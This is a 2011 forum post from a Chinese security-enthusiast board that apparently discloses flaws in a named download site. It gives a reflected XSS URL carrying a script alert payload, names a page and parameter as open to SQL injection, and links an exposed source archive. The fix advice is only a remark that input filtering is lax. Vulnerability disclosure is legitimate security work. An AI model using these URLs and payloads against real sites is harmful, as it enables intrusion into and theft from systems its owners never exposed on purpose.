【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 华军分站asp注入漏洞&xss&源码泄露及修复 [打印本页]

作者: 柔肠寸断 时间: 2011-3-3 04:50 标题: 华军分站asp注入漏洞&xss&源码泄露及修复

华军分站asp注入漏洞&xss&源码泄露及修复

简要描述：asp过滤不严格
详细说明：xss
http://flash.onlinedown.net/search.asp?type=soft&k=<script>alert%28%27frandy%27%29</script>
sql
http://flash.onlinedown.net/vote_flash.asp?id=4262
源码
http://flash.onlinedown.net/flash.rar
修复方案：这个站SQL过滤不严的文件灰常多,漏洞也灰常多,需要管理员费心了,

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)